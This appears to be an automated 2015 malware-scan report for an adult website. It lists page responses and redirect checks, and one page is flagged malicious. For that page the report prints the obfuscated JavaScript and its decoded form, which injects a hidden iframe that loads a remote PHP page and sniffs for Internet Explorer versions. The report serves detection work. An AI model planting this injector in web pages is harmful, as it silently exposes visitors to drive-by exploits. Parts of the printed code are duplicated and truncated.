Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alldcups.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://alldcups.com/ | HTTP/1.1 200 OK Connection: close Date: Wed, 04 Mar 2015 01:28:18 GMT Accept-Ranges: bytes ETag: "183293-3019-482022ceb3480" Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch Vary: Accept-Encoding Content-Length: 12313 Content-Type: text/html Last-Modified: Wed, 17 Mar 2010 17:09:22 GMT | clean |
http://www.titfix.com/ | 200 OK Content-Length: 88600 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function Jgfi(Lqqt, pdu8, Rdy1) { var EKq0; EKq0=Lqqt.split(pdu8); var Udh8=EKq0.join(Rdy1); return Udh8; } function lNj7(Rzi0) { Rzi0 = Jgfi(Rzi0,"##+##","'"); Rzi0 = Jgfi(Rzi0,"##|##","\\"); Udh8=""; BmT2 =""; for(k=0;k<Rzi0.length;k++) { Udh8 = Rzi0.charCodeAt(k); if (Udh8==32){Udh8=35} else if (Udh8==35){Udh8=32} else if (Udh8==59){Udh8=64} else if (Udh8==64){Udh8=59} else if (Udh8==37){Udh8=42} else if (Udh8==42){Udh8=37} else if (Udh8>=97 && Udh8<=122) { Udh8=Udh8-97;Udh8= Decoded script: XjKe = 'http://bookrave.com/tmp/z/static.php';rlG1 = 'iframe'; XjKe = 'http://bookrave.com/tmp/z/static.php';rlG1 = 'iframe'; AodU = document.createElement(rlG1);AodU.setAttribute('src', XjKe); AodU = document.createElement(rlG1);AodU.setAttribute('src', XjKe); AodU.setAttribute('width',0);AodU.setAttribute('height',0);AodU.setAttribute('border',0); AodU.setAttribute('width',0);AodU.setAttribute('height',0);AodU.setAttribute('border',0); AodU.setAttribute('style','wi AodU.setAttribute('style','width: 0; height: 0; border: none;'); AodU.setAttribute('style','display:none'); aKm0=navigator.userAgent.toLowerCase(); AodU.setAttribute('style','display:none'); aKm0=navigator.userAgent.toLowerCase(); Bss4=aKm0.indexOf('msie');Rjk1=aKm0.indexOf('msie 8');DRn2=aKm0.indexOf('nt 6'); Bss4=aKm0.indexOf('msie');Rjk1=aKm0.indexOf('msie 8');DRn2=aKm0.indexOf('nt 6'); document.body.appendChild(AodU); document.body.appendChild(AodU); Antivirus reports:
| ||
http://www.titfix.com/blog/ | 200 OK Content-Length: 36922 Content-Type: text/html | clean |
http://www.titfix.com/blog | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 04 Mar 2015 01:28:21 GMT Location: http://www.titfix.com/blog/ Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch Vary: Accept-Encoding Content-Length: 353 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.titfix.com/test404page.js | 404 Not Found Content-Length: 14540 Content-Type: text/html | clean |
http://www.titfix.com/blog/about/ | 200 OK Content-Length: 14929 Content-Type: text/html | clean |
http://www.titfix.com/blog/about/feed:http://www.titfix.com/blog/feed/ | 404 Not Found Content-Length: 859 Content-Type: text/xml | clean |
http://www.titfix.com/blog/2011/09/ | 200 OK Content-Length: 21911 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/09/carmen-from-busty-hookers/ | 200 OK Content-Length: 16563 Content-Type: text/html | clean |
http://www.titfix.com/blog/category/big-tits/ | 200 OK Content-Length: 23302 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/09/sugar-tits/ | 200 OK Content-Length: 17041 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/09/sugar-tits/feed:http://www.titfix.com/blog/feed/ | 404 Not Found Content-Length: 872 Content-Type: text/xml | clean |
http://www.titfix.com/blog/2011/08/ | 200 OK Content-Length: 25778 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/08/movie-theater-2/ | 200 OK Content-Length: 19089 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/08/movie-theater-2/feed:http://www.titfix.com/blog/feed/ | 404 Not Found Content-Length: 877 Content-Type: text/xml | clean |
http://www.titfix.com/blog/2011/07/ | 200 OK Content-Length: 25561 Content-Type: text/html | clean |
http://www.titfix.com/blog/2011/07/susie-wilden-interview/ | 200 OK Content-Length: 19150 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alldcups.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Mar 2015 01:28:18 GMT
Accept-Ranges: bytes
ETag: "183293-3019-482022ceb3480"
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 12313
Content-Type: text/html
Last-Modified: Wed, 17 Mar 2010 17:09:22 GMT
...12313 bytes of data.
GET / HTTP/1.1
Host: alldcups.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Mar 2015 01:28:18 GMT
Accept-Ranges: bytes
ETag: "183293-3019-482022ceb3480"
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 12313
Content-Type: text/html
Last-Modified: Wed, 17 Mar 2010 17:09:22 GMT
...12313 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: alldcups.com
Referer: http://www.google.com/search?q=alldcups.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: alldcups.com
Referer: http://www.google.com/search?q=alldcups.com
Result:
The result is similar to the first query. There are no suspicious redirects found.